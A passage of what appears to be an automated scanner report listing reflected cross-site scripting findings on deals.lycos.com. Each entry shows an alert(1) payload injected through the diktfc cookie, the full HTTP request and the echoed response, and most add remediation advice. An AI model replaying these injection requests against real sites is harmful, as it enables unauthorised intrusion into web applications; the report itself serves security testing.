<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
//b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/93-off-iphone-4-cases-at-hhi-extra-20-off-413441&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aaa21f"><script>alert(1)</script>c82f0e9250f&amp;cj=1" alt="tracker" />
...[SNIP]...

1.159. http://deals.lycos.com/deal/canon-eos-60d-18mp-dslr-body-899-413793 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/canon-eos-60d-18mp-dslr-body-899-413793

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 830f7"%3balert(1)//a3a48905539 was submitted in the diktfc cookie. This input was echoed as 830f7";alert(1)//a3a48905539 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/canon-eos-60d-18mp-dslr-body-899-413793 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A830f7"%3balert(1)//a3a48905539; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:28 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:28 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18163

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/canon-eos-60d-18mp-dslr-body-899-413793",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A830f7";alert(1)//a3a48905539"
});
</script>
...[SNIP]...

1.160. http://deals.lycos.com/deal/canon-eos-60d-18mp-dslr-body-899-413793 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/canon-eos-60d-18mp-dslr-body-899-413793

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26ef0"><script>alert(1)</script>8b18dd23c04 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/canon-eos-60d-18mp-dslr-body-899-413793 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A26ef0"><script>alert(1)</script>8b18dd23c04; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:27 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:27 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18196

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
rc="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/canon-eos-60d-18mp-dslr-body-899-413793&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A26ef0"><script>alert(1)</script>8b18dd23c04&amp;cj=1" alt="tracker" />
...[SNIP]...

1.161. http://deals.lycos.com/deal/casio-ex-fh20-9-1mp-digital-camera-for-200-414612 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/casio-ex-fh20-9-1mp-digital-camera-for-200-414612

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8507a"%3balert(1)//42fd6a583c was submitted in the diktfc cookie. This input was echoed as 8507a";alert(1)//42fd6a583c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/casio-ex-fh20-9-1mp-digital-camera-for-200-414612 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A8507a"%3balert(1)//42fd6a583c; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:15 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:15 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18680

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/casio-ex-fh20-9-1mp-digital-camera-for-200-414612",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A8507a";alert(1)//42fd6a583c"
});
</script>
...[SNIP]...

1.162. http://deals.lycos.com/deal/casio-ex-fh20-9-1mp-digital-camera-for-200-414612 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/casio-ex-fh20-9-1mp-digital-camera-for-200-414612

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a778"><script>alert(1)</script>da4cec6ed03 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/casio-ex-fh20-9-1mp-digital-camera-for-200-414612 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A7a778"><script>alert(1)</script>da4cec6ed03; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:13 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:14 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18137

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
/b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/casio-ex-fh20-9-1mp-digital-camera-for-200-414612&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A7a778"><script>alert(1)</script>da4cec6ed03&amp;cj=1" alt="tracker" />
...[SNIP]...

1.163. http://deals.lycos.com/deal/cut-the-rope-holiday-gift-for-iphone-for-free-414306 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/cut-the-rope-holiday-gift-for-iphone-for-free-414306

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b224"><script>alert(1)</script>91319e796f3 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/cut-the-rope-holiday-gift-for-iphone-for-free-414306 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2b224"><script>alert(1)</script>91319e796f3; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:43 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:43 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17969

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/cut-the-rope-holiday-gift-for-iphone-for-free-414306&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2b224"><script>alert(1)</script>91319e796f3&amp;cj=1" alt="tracker" />
...[SNIP]...

1.164. http://deals.lycos.com/deal/cut-the-rope-holiday-gift-for-iphone-for-free-414306 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/cut-the-rope-holiday-gift-for-iphone-for-free-414306

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82444"%3balert(1)//6b826531f72 was submitted in the diktfc cookie. This input was echoed as 82444";alert(1)//6b826531f72 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/cut-the-rope-holiday-gift-for-iphone-for-free-414306 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A82444"%3balert(1)//6b826531f72; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:45 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:45 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17889

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/cut-the-rope-holiday-gift-for-iphone-for-free-414306",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A82444";alert(1)//6b826531f72"
});
</script>
...[SNIP]...

1.165. http://deals.lycos.com/deal/dell-core-2-duo-2-9ghz-pc-24-lcd-469-414699 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/dell-core-2-duo-2-9ghz-pc-24-lcd-469-414699

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f1d2"%3balert(1)//3b0a90ac364 was submitted in the diktfc cookie. This input was echoed as 3f1d2";alert(1)//3b0a90ac364 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/dell-core-2-duo-2-9ghz-pc-24-lcd-469-414699 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A3f1d2"%3balert(1)//3b0a90ac364; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:28 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:28 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17361

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
script">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/dell-core-2-duo-2-9ghz-pc-24-lcd-469-414699",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A3f1d2";alert(1)//3b0a90ac364"
});
</script>
...[SNIP]...

1.166. http://deals.lycos.com/deal/dell-core-2-duo-2-9ghz-pc-24-lcd-469-414699 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/dell-core-2-duo-2-9ghz-pc-24-lcd-469-414699

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3028"><script>alert(1)</script>900481f7494 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/dell-core-2-duo-2-9ghz-pc-24-lcd-469-414699 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ac3028"><script>alert(1)</script>900481f7494; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:27 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:27 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17384

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/dell-core-2-duo-2-9ghz-pc-24-lcd-469-414699&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ac3028"><script>alert(1)</script>900481f7494&amp;cj=1" alt="tracker" />
...[SNIP]...

1.167. http://deals.lycos.com/deal/dell-financial-services-25-off-laptops-more-414325 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/dell-financial-services-25-off-laptops-more-414325

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e7bd"><script>alert(1)</script>9753846fcc9 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/dell-financial-services-25-off-laptops-more-414325 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2e7bd"><script>alert(1)</script>9753846fcc9; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:55 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:55 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18681

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/dell-financial-services-25-off-laptops-more-414325&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2e7bd"><script>alert(1)</script>9753846fcc9&amp;cj=1" alt="tracker" />
...[SNIP]...

1.168. http://deals.lycos.com/deal/dell-financial-services-25-off-laptops-more-414325 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/dell-financial-services-25-off-laptops-more-414325

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 298e6"%3balert(1)//fd955e4e72f was submitted in the diktfc cookie. This input was echoed as 298e6";alert(1)//fd955e4e72f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/dell-financial-services-25-off-laptops-more-414325 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A298e6"%3balert(1)//fd955e4e72f; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:56 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:56 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18637

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
>
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/dell-financial-services-25-off-laptops-more-414325",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A298e6";alert(1)//fd955e4e72f"
});
</script>
...[SNIP]...

1.169. http://deals.lycos.com/deal/dell-i5-dual-2-53ghz-14-laptop-bundle-900-414537 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/dell-i5-dual-2-53ghz-14-laptop-bundle-900-414537

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f572"><script>alert(1)</script>12d99f9dda4 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/dell-i5-dual-2-53ghz-14-laptop-bundle-900-414537 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
